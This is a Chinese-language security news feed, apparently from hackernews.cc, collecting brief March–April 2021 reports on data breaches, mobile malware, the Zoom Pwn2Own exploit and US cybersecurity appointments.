当前节点:hackernews.cc
时间节点
2021-04-14 15:20:34hackernews.cc
北京时间4月14日早间消息,白宫最高网络安全官员向各政府机构下达命令,要求它们为微软公司Exchange邮件服务器安装新补丁,因为服务器软件存在漏洞,可能会被黑客利用。 日前,美国国家安全局在软件中发现4个漏洞,于是上报给微软,这才有了今天的命令。负责网络和新兴技术的副国家安全顾问安妮·纽伯格(Anne Neuberger)在声明中表示:“我们意识到漏洞可能会带来系统性风险,所以有必要及时披露。” 微软声称至今并没有发现有谁利用漏洞,但黑客将会研究新补丁,看看微软修复了什么,然后黑客可能会利用漏洞攻击未打补丁的计算机。 今年年初时,美国约有2万多台Exchange服务器遭到攻击,这些服务器主要用来处理Web版Outlook邮件。   (消息及封面来源:新浪科技)
2021-04-14 15:20:34hackernews.cc
超过50万名华为用户从该公司的官方Android商店AppGallery下载了感染Joker恶意软件的应用,订阅了高级移动服务。研究人员在AppGallery中发现了10个看似无害的应用,这些应用含有连接到恶意命令和控制服务器以接收配置和附加组件的代码。 反病毒厂商Doctor Web的一份报告指出,这些恶意应用保留了其宣传的功能,但下载的组件可以让用户订阅高级移动服务。为了让用户无法察觉,受感染的应用程序要求访问通知,这使得他们能够拦截订阅服务通过短信传递的确认代码。 据研究人员介绍,该恶意软件最多可以为一个用户订阅五项服务,不过威胁行为人可以随时修改这一限制。恶意应用程序的清单包括虚拟键盘、相机应用程序、启动器、在线信使、贴纸收集、着色程序和游戏。 其中大部分来自一个开发商,两个来自不同的开发商。这十款应用被超过53.8万名华为用户下载。这些应用告知华为,该公司从AppGallery中删除了这些应用。虽然新用户不能再下载它们,但已经在设备上运行这些应用的用户需要进行手动清理。 研究人员表示,AppGallery中被感染的应用程序下载的相同模块也存在于Google Play上的其他应用程序中,被其他版本的Joker恶意软件使用。完整的被感染应用列表可在这里获得。一旦激活,恶意软件就会与其远程服务器通信,以获取配置文件,其中包含任务列表、高级服务的网站、模拟用户交互的JavaScript。 Joker恶意软件的历史最早可以追溯到2017年,并不断在通过Google Play商店分发的应用中找到它的踪迹。2019年10月,卡巴斯基的安卓恶意软件分析师Tatyana Shishkova在推特上发布了70多个被入侵的应用,这些应用已经进入了官方商店。 而关于Google Play中恶意软件的报道也不断出现。2020年初,谷歌宣布,自2017年以来,已经删除了约1700个感染了Joker的应用。去年2月,Joker仍然存在于商店中,即使在去年7月,它也继续从谷歌的防御系统中溜走。   (消息及封面来源:cnBeta)
2021-04-13 14:31:17hackernews.cc
在 SolarWinds 软件更新打包服务器遭遇黑客攻击,并且对政企客户造成了巨大的威胁之后,拜登政府也终于下决心组建一支网络安全领域的专业队伍。周一的时候,有外媒报道称,拜登总统已任命两位前国家安全局资深人员,担任美国政府的高级网络安全职务,其中还包括了首位国家网络总监(National Cyber Director)。 今年早些时候发生的针对美国科技巨头 SolarWinds 公司的黑客入侵 + 后门程序植入事件,目前已知至少波及到了 9 家联邦机构。 在周一宣布的人事任命中,包括了奥巴马执政时期的前国家安全局官员、美国网络司令部发起者之一的 Jen Easterly,他已被提名为国土安全部旗下的网络安全咨询部门(CISA)的新负责人。 此外拜登任命了前国家安全局副局长 John“Chris”Inglis 为国家网络总监,这个新职务由国会在去年年底时设立,旨在监督和负责民政与国防机构的网络安全和相关预算。 预计他将与一月份被任命为国家安全委员会网络安全副顾问的 Anne Neuberger 紧密合作,作为 NSA 的前高管,后者也是网络安全的第一负责人,比如协助政府应对 SolarWinds 攻击和 Exchange 邮件服务器黑客事件。 最后,拜登提名了前奥巴马时代的网络安全政策助理秘书 Rob Silvers 来担任国土安全部的战略、政策和计划副部长(近期也有被选至 CISA 的最高职位)。 上述信息由《华盛顿邮报》最先披露,不过 Jen Easterly 和 Rob Silvers 的提名仍需通过参议员的确认。   (消息及封面来源:cnBeta)
2021-04-13 14:11:23hackernews.cc
据知名网络安全新闻网站KrebsOnSecurity报道,有人正在网络犯罪论坛上出售在北美颇受欢迎的移动停车应用ParkMobile的2100万客户的账户信息。被盗数据包括客户的电子邮件地址、出生日期、电话号码、车牌号、哈希密码和邮寄地址。 KrebsOnSecurity首次从纽约市的威胁情报公司Gemini Advisory那里听说了这一漏洞,该公司密切关注网络犯罪论坛。Gemini在一个俄语犯罪论坛上分享了一个新的销售线索,在附带的被盗数据截图中包含了一些用户的ParkMobile账户信息、电子邮件地址和电话号码,以及车辆的车牌号。 当被问及销售线索时,总部位于亚特兰大的ParkMobile表示,该公司在3月26日发布了一则通知,内容是 “发生了一起网络安全事件,与我们使用的一款第三方软件的漏洞有关”。 “作为回应,我们立即在一家领先的网络安全公司的协助下展开调查,以解决这一事件,”通知中写道。“出于谨慎起见,我们也已经通知了相关执法部门。调查还在进行中,我们目前能提供的细节有限。” 声明还指出:“我们的调查表明,我们加密的敏感数据或支付卡信息均未受影响。同时,自从了解到该事件以来,我们还采取了其他预防措施,包括消除第三方漏洞,维护我们的安全性以及继续监视我们的系统。” 当被要求澄清攻击者确实获取了什么信息时,ParkMobile证实其中包括基本的账户信息–车牌号,如果提供,还包括电子邮件地址或电话号码等。 “在一小部分情况下,可能会有邮寄地址,”发言人Jeff Perkins说。 ParkMobile并不存储用户密码,而是存储了一种相当强大的单向密码哈希算法的输出,这种算法被称为bcrypt,它比MD5等常见的替代方案更耗费资源,破解成本更高。从ParkMobile窃取并出售的数据库包括每个用户的bcrypt哈希值。 “你说的没错,bcrypt哈希值和‘加盐’密码都被获得了,”当被问及数据库销售线程中的截图时,Perkins说。 “注意,我们的系统中并没有保留加盐值,”他说。”此外,被泄露的数据不包括停车历史、位置历史或任何其他敏感信息。我们不会向用户收集社会安全号码或驾驶执照号码。” ParkMobile表示,它正在最后确定其支持网站的更新,以确认其调查的结论。但不知道其有多
2021-04-13 11:11:19hackernews.cc
世界各地的政府和政客正在利用Facebook如何对不真实活动进行监管的漏洞,伪造民众支持率以骚扰对手。来自《卫报》的调查基于内部文件和前Facebook数据科学家Sophie Zhang的证词,显示了该公司如何选择性地选择对这种活动采取行动。 Facebook迅速采取行动,处理美国、韩国等富裕国家和地区为左右政治而开展的协调活动,而对阿富汗、伊拉克、墨西哥和拉丁美洲大部分地区等较贫穷国家的类似活动的报道却不重视或干脆置之不理。 “Facebook上有很多伤害没有得到回应,因为它没有被认为是对Facebook构成足够的公关风险,”Sophie Zhang告诉卫报。”成本不是由Facebook承担的。它是由更广泛的世界作为一个整体来承担的。” Sophie Zhang发现的漏洞涉及到利用Pages创建假的支持者,被政府用来操控,使其显得受欢迎同时用来批评对手。虽然Facebook禁止人们操作一个以上的账户,但任何个人都可以创建多个Pages,并取得类似的效果。Pages通常用于代表企业、慈善机构、非营利组织或其他组织,但可以很容易地改变成个人账户的样子。 洪都拉斯就发生了一起利用这一漏洞的案例,该国总统胡安·奥兰多·埃尔南德斯(Juan Orlando Hernández)的Facebook页面的管理员创建了数百个Pages来为自己的帖子点赞,并营造出民众支持的假象。(2017年埃尔南德斯的选举因舞弊而广受批评。)同样,在阿塞拜疆,在总统伊利哈姆·阿利耶夫(Ilham Aliyev)的领导下,阿塞拜疆经历了多年的威权统治,执政党利用虚拟Pages来骚扰反对派政客,并批评独立媒体的新闻报道。下面来自《卫报》的视频展示了这些操作是如何进行的。 Sophie Zhang曾在Facebook的诚信团队工作,负责识别此类虚假活动,因表现不佳于2020年9月被Facebook解雇。在她最后一天分享的一份备忘录中,她描述了她是如何发现 “外国国家政府多次公然企图大规模滥用我们的平台来误导本国公民”。 当Zhang向她的经理们报告这类假Pages网络时,Facebook高层的反应并不一致。该公司对一些报告反应缓慢(《卫报》称,该公司花了 “近一年时间 “删除洪都拉斯的页面,花了14个月时间下架阿塞拜疆的活动),而对Zhang发现的其他网络
2021-04-13 10:51:14hackernews.cc
据外媒BGR报道,大学生Zamaan Qureshi在社交媒体上为自称 “真正的Facebook监督委员会”的临时活动家组织工作,他被几天前Facebook大规模数据泄露的消息所震惊,决定进行一番调查。 首先,他在 “Have I Been Pwned “网站上查找自己,该网站很好地快速收集了被卷入最近的数据泄露事件中的Facebook用户的数据,以便他们检查并查看自己是否受到影响。Qureshi使用了 “Have I Been Pwned “提供的电话查询功能,他发现他的数据也被包含其中。Qureshi继续调查这个世界上最大的社交网络到底有多少他的数据。 “我一直知道,当你不在Facebook平台上时,Facebook会收集用户数据,这让我很担心,”Qureshi告诉《新闻周刊》。”(Facebook)说他们对数据收集的方式很透明,所以我想看看是否真的如此。” 基本上,他使用了一个还比较新的Facebook设置,允许用户查看关于他们的非Facebook活动被记录的情况。人们可以通过选择 “设置与隐私”>”设置”>,然后点击 “你的Facebook信息 “菜单下的 “Off-Facebook活动 “来进入这个选项。Qureshi下载了这些数据,然后发现有几十个文件夹和子文件夹,里面装满了Facebook从互联网上收集到的关于他的信息。在下面的视频中看他滚动浏览所有这些数据。 在Twitter上,他继续展示了Facebook是如何收集他的数据的细节,以至于Facebook甚至知道他什么时候订了披萨(这要归功于第三方的数据整合)–以及他什么时候申请了福特汉姆大学。 Qureshi表示:“我希望我的工作要做的是向人们展示正在收集哪些类型的数据,即使他们不在Facebook上也是如此。但归根结底,问题在于,(Facebook的)商业模式是通过用户信息获利,以最大程度地提高私隐权。” 随着iOS 14.5的即将发布,苹果将开始执行其应用跟踪透明度的要求,此举触及了Facebook商业模式的核心。在这个新的框架下,应用程序今后需要获得明确的iPhone用户许可,才能在网络上对其进行追踪。 Facebook批评
2021-04-12 18:30:42hackernews.cc
在年度黑客大会 Pwn2Own 中,两位来自荷兰的白帽安全专家凭借着在 Zoom 中发现的远程代码执行(RCE)漏洞,获得了 20 万美元的赏金。Pwn2Own 大会是由 Zero Day Initiative 举办的一场高规格黑客比赛,主要是让黑客在限定时间内对常用软件、移动设备发起挑战。 举办该活动的目的是为了验证流行的软件、服务、设备都存在缺陷和漏洞,并通过赏金的方式来遏制漏洞的地下交易。这些受到攻击的“targets”自愿提供自己的软件和设备,并对攻击成功者给予奖励。 受雇于网络安全公司 Computest 的 Keuper 和 Alkemade 在本次活动的第二天,通过 3 个漏洞的整合成功接管了一个远程系统。这些漏洞不需要受害者参与互动,只要开启 Zoom 会话就可以了。 这些 Zoom 漏洞适用于 Windows 和 macOS 端,不过网页端 Zoom 并不受影响。目前尚不清楚 Android 和 iOS 端的 APP 是否也存在这些漏洞,因为Keuper和Alkemade并没有对这些进行研究。 Pwn2Own组织在推特上发布了一个gif图,展示了该漏洞的运行情况。你可以看到攻击者在运行Zoom的系统上打开计算器。Calc.exe经常被用作黑客在远程系统上打开的程序,以表明他们可以在受影响的机器上运行代码。   (消息及封面来源:cnBeta)
2021-04-12 14:50:36hackernews.cc
Gigaset 透露,在其 Android 设备上发现的恶意软件感染事件,是由外部更新服务提供商的服务器遭到黑客攻击而导致的。这家德国电信设备制造商表示,此事似乎可追溯到 3 月 27 日,受影响的智能机型号包括 GS100、GS160、GS170、GS180、GS270(plus)、以及 GS370(plus)等系列。 通过与安装的系统更新 App 下载并安装,这批恶意软件的形式也是五花八门。Gigaset 表示已及时向更新服务提供商发出了警告,并在 4 月 7 日阻断了进一步的感染。 目前 Gigaset 已经为受影响的设备部署了自动清除恶意软件的措施,并建议用户将设备连接到互联网(打开 WLAN 或开启移动数据)和连接至充电器。 如果一切顺利的话,感染恶意软件的设备可在 8 小时内得到恢复。以下是本次 Gigaset 设备上感染的恶意软件完整列表: ● Gem ● Smart ● Xiaoan ● asenf ● Tayase ● com.yhn4621.ujm0317 ● com.wagd.smarter ● com.wagd.xiaoan 此外 Gigaset 敦促用户访问“设置”应用,以检查设备是否存在安装疑似恶意软件的感染迹象,并且确保设备上的其它软件也都更新到了最新版本。 具体受影响的设备型号包括 GS160 / GS170 / GS180 全版本,以及 GS100_HW1.0_XXX_V19、GIG_GS270_S138、GIG_GS270_plus_S139、GIG_GS370_S128 和 GIG_GS370_plus_S128 等最高版本。 除此之外,GS110、GS185、GS190、GS195、GS195LS、GS280、GS290、GX290、GX290plus、GX290 PRO、GS3 和 GS4 系列并未受到本次事件的影响。   (消息及封面来源:cnBeta)
2021-04-12 14:10:32hackernews.cc
据外媒AppleInsider报道,约130万Clubhouse用户的数据被发布到了一个黑客论坛上,但iOS应用的开发者声称该平台并没有被黑客攻击,这些数据是公开的信息。发布到论坛上并公开可见的SQL数据库包括了这个基于音频的高人气社交网络用户的许多细节。约有130万用户的数据被获取并放入数据库中。 据Cybernews报道,数据库中的数据清单涵盖了相当多的个人信息,包括账户的用户ID、用户的姓名、用户名、粉丝和关注者数量、账户创建的时间,以及谁邀请用户加入。 虽然看起来信息很多,但数据库中的数据主要是由其他地方可能公开的信息组成的。它不包括密码或电子邮件地址等敏感信息,这可能是一种更具破坏性的情况。 周日,Clubhouse在Twitter上发帖,称有关它被黑客攻击的报道是“误导和虚假的”。该应用坚持认为,它没有被入侵或遭黑客攻击,数据是“我们应用的所有公共档案信息,任何人都可以通过应用或我们的API访问”。 这些数据是一连串攻击中的最新一次,在这些攻击中,邪恶的攻击者从主要服务中窃取数据并将其泄露供公众公开查看。4月8日,5亿份LinkedIn资料的缓存以同样的方式被分享,但似乎只包括面向公众的信息。 更著名的是,4月3日,约5.3亿个Facebook账户的类似档案被公布,据称这与2019年的一次未披露的漏洞有关。在Facebook的案例中,数据包括更多敏感信息,包括出生日期、电话号码和电子邮件地址。 这不是Clubhouse在其相对短暂的存在中经历的唯一一次安全恐慌。今年2月,由于担心用户数据可能会被恶意黑客窃取,该公司对其安全性进行了升级。 随后,阿曼的监管机构决定在该国封锁该应用,借口是许可证问题,对该应用进行了打击。批评者担心这是政府的审查企图。   (消息及封面来源:cnBeta)
2021-04-08 11:43:00hackernews.cc
欧盟司法专员Didier Reynders、卢森堡首相Xavier Bettel和数十名欧盟官员都被卷入了Facebook的数据泄露事件,该事件被发布到公共论坛上并广泛流传。 他们的数据是周六被发现的5.33亿条记录的一部分,包括电话号码、Facebook ID、全名和出生日期,并在网上论坛上免费流传。POLITICO看到的比利时和卢森堡受害者的数据集还包含数十名欧盟官员的电话号码,包括欧盟委员会内阁成员、欧盟外交官和工作人员。POLITICO在周二核实了几位官员详细资料的真实性。 当POLITICO联系到Xavier Bettel时,他说他知道自己的详细资料出现在网上。德国首席联邦隐私监管机构乌尔里希-凯尔伯(Ulrich Kelber)也在推特上表示,他收到的诈骗信息是泄密事件的后果。欧盟委员会没有立即回应评论请求。欧盟的网络应急响应小组(CERT-EU)正在调查此次泄密事件可能对欧盟机构及其工作造成的影响。 黑客滥用数据的一种常见方式是一种被称为 “smishing “的技术,涉及到网络罪犯或黑客试图引诱受害者点击链接或回应短信中的请求。在过去的12个月里,每季度的Smishing消息已经增加了300%,消费者信任移动消息,他们比电子邮件中的链接更有可能阅读和访问移动消息文本中的链接。 如果政治家或公众人物的手机号码被广泛使用,这可能会使这些人容易受到SIM交换攻击等直接威胁、。SIM交换是一种技术,黑客说服电信运营商将一个电话号码换成新的SIM卡,这样他们就能获得用户的短信,而用户却不能。黑客可以通过提示应用发送短信登录,获得银行账户、电子邮件和社交媒体账户的权限。 专家建议,为了防止被黑客攻击,使用额外的安全措施是关键,特别是如果你是潜在的高调目标,比如媒体人或政治家,使用移动认证器应用程序进行双因素认证,并使用独特的长密码。欧盟自己的网络安全专家也呼吁同事检查自己是否是攻击的受害者。欧盟网络安全局(ENISA)发言人表示,该机构建议官员们在HaveIBeenPwned等网站上检查自己是否是受害者。 该发言人表示,万一信息泄露,要注意可疑的短信以及移动设备上突然失去运营商服务,这将表明黑客试图进入其他在线账户。泄露的Facebook数据是由网络犯罪情报公司Hudson Rock的Alon Gal在周末发现的。监管机构正在调查Facebook遭遇数据泄露时是否违反了隐私规则。 &#
2021-04-08 11:43:00hackernews.cc
安全研究人员在Google Play上的一款应用中发现了一个新的Android恶意软件变种,该软件通过承诺免费订阅Netflix来吸引受害者。周三,Check Point Research(CPR)表示,这种 蠕虫类移动恶意软件是在Android应用的官方存储库Google Play商店中被发现的。 这款被称为 “FlixOnline “的恶意软件将自己伪装成一个合法的Netflix应用,似乎重点针对WhatsApp消息应用。COVID-19大流行迫使我们许多人长期呆在家里,商店关门,酒吧关闭,允许外出的次数有限,我们转而使用流媒体服务来打发时间。到2020年底,Netflix的付费用户数突破了2亿大关。很可能是由于COVID-19的刺激,恶意软件运营商决定抓住这一趋势。”FlixOnline “欺诈性应用承诺全球 “无限娱乐”,并因大流行而免费订阅两个月的高级Netflix。 然而,一旦下载,该恶意软件就会 “监听 “WhatsApp的对话,并自动回复带有恶意内容的信息。安装后,该应用会要求获得覆盖权限,这是盗窃服务凭证的常见行为,它还要求忽略电池优化,它可以阻止设备自动关闭软件以节省电力。此外,FlixOnline还要求获得通知权限,使恶意软件能够访问与WhatsApp通信相关的通知。 WhatsApp消息的自动回复包括以下内容,发送给受害者的联系人,”在世界任何地方60天获得2个月的Netflix高级免费服务。”,并且附带一条恶意链接。据研究人员介绍,该恶意软件可以通过恶意链接进一步传播,窃取WhatsApp的对话数据,并在安卓设备上安装后,有能力通过消息服务传播虚假信息或有害内容。 此次活动中使用的恶意链接会将受害者发送到一个虚假的Netflix网站,试图获取用户的信用卡信息和证书。然而,由于该消息是从命令和控制(C2)服务器获取的,其他恶意活动可能会链接到不同的钓鱼网站或恶意软件有效载荷。 在被发现之前,FlixOnline约造成500名受害者,时间大约为两个月,而且该恶意软件很可能会再次出现。CPR将其发现告知谷歌,目前该应用已从Play Store中删除。WhatsApp也被告知该活动,但由于没有可利用的漏洞或问题,恶意软件使用通过消息应用程序传播,因此不需要采取行动。 &#160
2021-04-06 10:21:16hackernews.cc
近日,美国社交媒体脸书(Facebook)超5亿用户的个人数据遭到泄露,包括电话号码、电子邮件等信息。俄媒称,脸书创始人扎克伯格的电话号码也遭泄露。据新闻网站商业内幕(Business Insider)报道,一个低级别的黑客论坛3日曝光了5.33亿脸书用户的个人数据,这些用户涉及 106个国家,泄露的信息包括脸书ID、用户全名、位置、生日、个人简介以及电子邮件地址。 令大众吃惊的是,公布的这些个人隐私信息数据涉及来自 106 个国家的 5.33 亿 Facebook 用户,其中包括 3200 万美国用户,1100 万英国用户,600 万印度用户。 俄罗斯卫星通信社4日报道,遭泄露的5.33亿脸书用户数据中包含一些名人的信息,扎克伯格的电话号码也在其中。有消息称,遭泄露的电话号码与扎克伯格的真实号码是一致的。 网络犯罪情报公司Hudson Rock的首席技术官加尔首先发现了脸书用户数据泄露,通过比对他所认识的人的信息,证实至少有一部分内容是真实的。 事发后,脸书公司在4月3日的一份声明中称,上述数据来自2019年发生的信息泄露事件,当年8月已经进行修复。 此前,Facebook曾将8000万用户数据与剑桥分析公司(Cambridge Analytica)进行分享,而后者则将这些数据用于2016年美国大选政治广告,这严重违反了Facebook的服务条款。扎克伯格承认对此事负有责任并道歉。随后,美国联邦贸易委员会对此事展开调查,并对脸书开出50亿美元罚单。 国际上也有应对此事的相关法律条令和组织,例如「GDPR」是 (The European) ,意思为「通用数据保护条例」,是欧盟议会和欧盟理事会在 2016 年 4 月通过,在 2018 年 5 月开始强制实施的规定。 GDPR 本质上来说是一系列「打鸡血」版强制执行隐私条例,规定了企业了在对用户的数据收集、存储、保护和使用时新的标准;另一方面,对于自身的数据,也给予了用户更大处理权。GDPR虽然保护范围只在于欧洲生活的人民,但因为考虑到「全球性」是写入互联网基因内的属性,几乎所有的服务都会受到影响,所以生活在欧洲之外的人其实也会从此条例中获益。 据公开信息纰漏,如果2018年脸书的“剑桥分析事件”发生在了GDPR的管辖范围之内,则其可能被处罚1700万英镑或全球营业额4%的巨额罚款。 全球用户隐私数据泄漏事件愈发频繁 过去,影响几百万人的数据泄露事件就能成为新闻头条
2021-04-06 10:21:16hackernews.cc
一个黑客论坛公布了超过5亿Facebook用户的个人数据缓存,这是迄今为止该社交网络在数据保护方面的最大失误之一。该数据库包含了全球数亿Facebook用户的个人数据,这些数据在本周六被发现,有可能被用于各种犯罪,包括其他黑客和社交工程。 网络犯罪研究公司Hudson Rock首席技术官Alon Gal建议,这些数据包括用户的全名,以及Facebook ID、地点、出生日期、个人简历、电话号码和电子邮件地址。安全人员将缓存中的部分数据与Facebook的密码重置功能进行对比验证,发现数据是真实的。 数据中列出了超过5.33亿用户,覆盖106个国家。其中超过3200万条记录是美国用户,1100万条记录来自英国,600万条记录来自印度。 “这么大的数据库,包含了很多Facebook用户的电话号码等私人信息,肯定会有不良分子利用这些数据。”加尔说。 在可能会让受影响的Facebook用户感到沮丧的情况下,Gal在1月份首次发现了一个黑客论坛的用户为一个自动机器人做广告,声称可以爬取数百万用户的电话号码。该机器人收集的数据集似乎是免费发布到论坛上的,使得任何人都可以免费获取。 Gal认为,现阶段除了通知用户警惕利用其个人数据的钓鱼计划或欺诈行为外,既然数据已经流传开来,Facebook作为第一方实际上也没有什么办法应对。             (消息来源:cnBeta;封面源自网络)
2021-04-01 11:43:20hackernews.cc
Ubiquiti 是一家专业的消费级路由器厂商,凭借着安全和可管理性赢得市场的认可。不过该公司近日却被指责掩盖一个“灾难性”的安全漏洞,在沉默了 24 小时之后,现在该公司发表了一份声明,并没有否认举报人的说法。 在今年 1 月 11 日发给“第三方云提供商”的公开信中,表示发现了一个轻微的安全漏洞。不过知名网络安全新闻网站 KrebsOnSecurity 报道称,该漏洞实际远比 Ubiquiti 描述的更加严重。一位来自该公司的举报人向 Krebs 透露,Ubiquiti 本身也被黑客入侵,只不过该公司的法律团队阻止了向客户准确报告危险的努力。 黑客获得了对公司 AWS 服务器的完全访问权,因为据称 Ubiquiti 在 LastPass 账户中留下了根管理员的登录信息,黑客可能已经能够访问客户通过公司的云服务设置控制的任何 Ubiquiti 网络设备。 消息人士告诉 Krebs:“他们能够获得单点登录cookie和远程访问的密码学秘密,完整的源代码控制内容,以及签名密钥”。而 Ubiquiti 今天晚上终于发表声明时,公司依然在强调目前没有任何证据表明用户数据被访问或者被盗。 但正如 Krebs 所指出的那样,举报人明确表示,该公司并没有保留日志,而这些日志可以作为该证据,说明谁做了或没有访问被黑的服务器。Ubiquiti 的声明还证实,黑客确实试图向其勒索钱财,但并没有涉及掩盖事实的指控。 “正如我们在1月11日通知您的那样,我们是一起网络安全事件的受害者,该事件涉及未经授权访问我们的IT系统。鉴于布莱恩-克雷布斯的报道,人们对此事产生了新的兴趣和关注,我们希望向我们的社区提供更多信息。 首先,请注意,自1月11日通知以来,我们对客户数据的分析和产品的安全性没有任何变化。针对此次事件,我们利用外部事件响应专家进行了彻底的调查,以确保攻击者被锁定在我们的系统之外。 这些专家没有发现任何证据表明客户信息被访问,甚至是目标。攻击者试图通过威胁发布被盗的源代码和特定的 IT 凭证来敲诈公司,但没有成功,他从未声称访问过任何客户信息。这一点以及其他证据表明,我们相信客户数据不是此次事件的目标,也不是与此次事件有关的其他访问。 在这一点上,我们有充分的证据表明,肇事者是一个对我们的云基础设施有深入了解的人。由于我们正在与执法部门合作进行调查,我们无法进一步评论。 说了这么多,作为预防措施,我们仍然鼓励您更改密码,如果您
2021-03-31 17:00:37hackernews.cc
据外媒报道,据两名熟悉此次网络更经济的美国国会消息人士透露,去年,疑似俄罗斯黑客窃取了数千封国务院官员的电子邮件。这是在不到10年时间里由克里姆林宫支持的对美国务院电子邮件服务器发起的第二起已知攻击。 美国会消息人士称,黑客侵入了国防部欧洲和欧亚事务局及东亚和太平洋事务局的电子邮件。第三位官员称,目前看来,这个机密网络还没有被攻破。 目前尚不清楚被盗国务院电子邮件是否是SolarWinds间谍活动的一部分。据悉,SolarWinds是俄罗斯黑客潜入躲美联邦政府和私营部门网络利用的一家软件开发IT公司–在政府和私营机构都有使用。据《华盛顿邮报》(The Washington Post)报道,美国国务院就使用了SolarWinds软件并在漏洞中暴露了自己。 这一具体事件以前没有被报道过。 美国务院发言人在回应有关黑客攻击的问题时称:“国务院有认真履行保护信息安全的责任并不断采取措施确保信息受到保护。出于安全原因,我们目前无法讨论任何所谓网络安全事件的性质或范围。” 负责网络和新兴技术的副国家安全顾问Anne Neuberger在一份声明中指出,白宫对具体机构不予置评。 “去年有几家联邦机构遭到黑客攻击。作为政府SolarWinds审查的一部分,我们发现联邦机构在网络安全防御方面存在巨大漏洞。我们确定了五个具体的网络安全现代化领域、评估了针对这些领域的机构并正在实施一个‘重建更好’计划以迅速资助和推出这些技术进而弥补漏洞并使我们的网络安全方法更现代化,”Neuberger说道。 美国务院电子邮件被盗事件表明,被怀疑是俄罗斯黑客的人获得的美国政府资料比公众此前所知的要多。受影响的办事处负责处理跟北约、欧洲和印度-太平洋伙伴等美国盟友有关的问题。 这次黑客攻击引发了人们对美国国务院网络安全实践的质疑–这是10年内已知的疑似俄罗斯黑客攻入美国务院的电子邮件服务器的第二次。2015年,俄罗斯黑客成功侵入国务院的网络和白宫的电脑。新冠大流行五一加剧了这种风险,因为许多联邦雇员在不那么安全的系统上远程工作。 对此,俄罗斯大使馆发言人没有立即回应置评请求。           (消息来源:cnBeta;封面源自网络)
2021-03-31 17:00:37hackernews.cc
美联社报道称,美国土安全部门要员的电子邮件账户,亦受到了 SolarWinds 恶意软件活动的幕后黑手的影响。据悉,这批账户属于特朗普总统在 2019 年 11 月任命的代理国务卿 Chad Wolf,以及负责调查境外威胁的国土安全部官员。 早在 2020 年 12 月,FireEye 网络安全专家就曝光了波及甚广的 SolarWinds 黑客入侵事件,导致成千上万的企业和政府机构在部署恶意更新后被感染。 周一的报道称,疑似俄方黑客入侵了特朗普政府要员的电子邮件账户,而受害者本就负责着与之对抗的工作。 此外上月的消息称,除了百余家私营企业,SolarWinds 黑客还打击了包括国土安全部在内的至少 9 个联邦机构。 截止外媒发稿时,美国土安全部尚未就此事给出回应。不过美联社称,在事件曝光后的几天里,Char Wolf 等人就已经换成了支持加密聊天的软件服务来开展通信。           (消息来源:cnBeta;封面源自网络)
2021-03-31 10:19:29hackernews.cc
据外媒报道,从历史上看,勒索软件依赖于加密数据,然后借此索要赎金。但F-Secure的一份新报告显示,2020年,偷窃数据的勒索软件有所增加,这让攻击者对受害者有了更大的影响力。如果组织首先拒绝支付赎金来解密他们的数据,那么攻击者就会威胁泄漏被盗的信息并增加受害者的压力。 2019年,只有一个勒索软件组被观察到使用这种类型的勒索–被称为Ransomware 2.0,但到2020年底,已有15个不同的勒索软件家族采用了这种方法。此外,截止到去年年底,在2020年发现的近40%的勒索软件家庭及一些年龄更大的家族都曾窃取过受害者的数据。 报告还显示了其他一些网络安全趋势,包括攻击者使用Excel公式(一种无法被阻止的默认功能)来混淆恶意代码,但到2020年下半年,恶意代码的数量将增加两倍。 据悉,Outlook是最受钓鱼邮件欺骗的品牌,其次是Facebook和Office365。2020年,电子邮件占所有恶意软件感染尝试的一半以上,从而使其成为网络攻击中传播恶意软件最常见的方法。 在过去10年的显著供应链攻击中,报告强调,超一半的攻击目标是公用事业或应用软件。报告作者们表示,希望去年的SolarWinds黑客事件将引起人们对这些攻击可能产生的影响的更多关注。 “在安全方面,我们非常重视组织通过拥有强大的安全防线、快速识别漏洞的检测机制以及遏制入侵的响应计划和能力来保护自己。然而,跨越行业和边界的实体也需要共同努力,从而应对供应链上游的安全挑战。高级持续性威胁组织显然已经准备好并愿意通过这种方式危及数百个组织,我们应该共同努力对抗他们,”F Secure战术防御部门经理Calvin Gan说道。           (消息及封面来源:cnBeta)
2021-03-30 10:18:05hackernews.cc
分析公司Canalys警告说,未能在网络安全上投入更多资金的企业将面临 “大量倒闭”。因为研究人员发现过去的12个月里,被入侵的数据比过去15年的总和还要多。勒索软件攻击数量激增,在全球性卫生事件的背景下,医院又成为特殊的目标。由于社交距离和线上工作逐步成为常态,许多企业以牺牲网络安全为代价实施业务连续性措施,进一步加剧了网络安全问题。 Canalys首席分析师Matthew Ball在评论这份全新的有关网络安全的报告时表示: “网络安全必须成为数字计划的前沿和中心,否则将出现大规模的企业组织灭绝,这将威胁到COVID-19大流行后的经济复苏。对网络安全关注的失误已经产生了重大影响,导致当前数据泄露危机的升级和勒索软件攻击的加速。” 虽然Canalys表示,在网络安全支出方面还需要做更多的工作,但它也表示,去年网络安全投资已经明显高于IT行业的其他领域。网络安全支出增长到530亿美元,大增10%,但并非增长最快领域,表现优于网络安全的领域是业务连续性和劳动力生产力,其中云基础设施服务增长33%,云软件增长20%。 从单个公司来看,Zoom的远程沟通方案令其营收猛增300%,微软Office 365办公环境带来的业绩保持了两位数的增长,硬件方面,笔记本电脑的出货量也创下了历史新高,罗技的网络摄像头销量也在蓬勃发展,甚至连Wi-Fi路由器的销量也随着人们转向在家办公而增长了40%。 虽然这些事情都很重要,但Canalys最终还是希望企业增加在网络安全方面的支出,因为不这样做最终可能会因为恢复成本过高而导致企业破产。           (消息及封面来源:cnBeta)
2021-03-30 10:18:05hackernews.cc
根据帮助短信路由的通信公司Aerialink的公告,美国所有的主要运营商都对短信的路由方式进行了重大改变,以防止黑客能够轻易地对目标短信进行改道。此举是在Motherboard网站调查后发生的。 该调查发现一个黑客,以最小的努力,支付16美元,就可以重新路由短信,然后使用这种能力,闯入一些在线帐户,包括Postmates,WhatsApp和Bumble,暴露了美国电信基础设施存在的一个缺陷。 3月25日来Aerialink公告表示,无线运营商将不再支持在各自的无线号码上启用短信或彩信文本,这一变化是全行业的,影响到移动生态系统中的所有短信提供商。请注意,Verizon、T-Mobile和AT&T已经在全行业范围内收回了被覆盖的支持短信的无线号码。因此,任何Verizon、T-Mobile或AT&T的无线号码,如果曾作为BYON启用文本,则不再通过Aerialink网关路由消息流量。 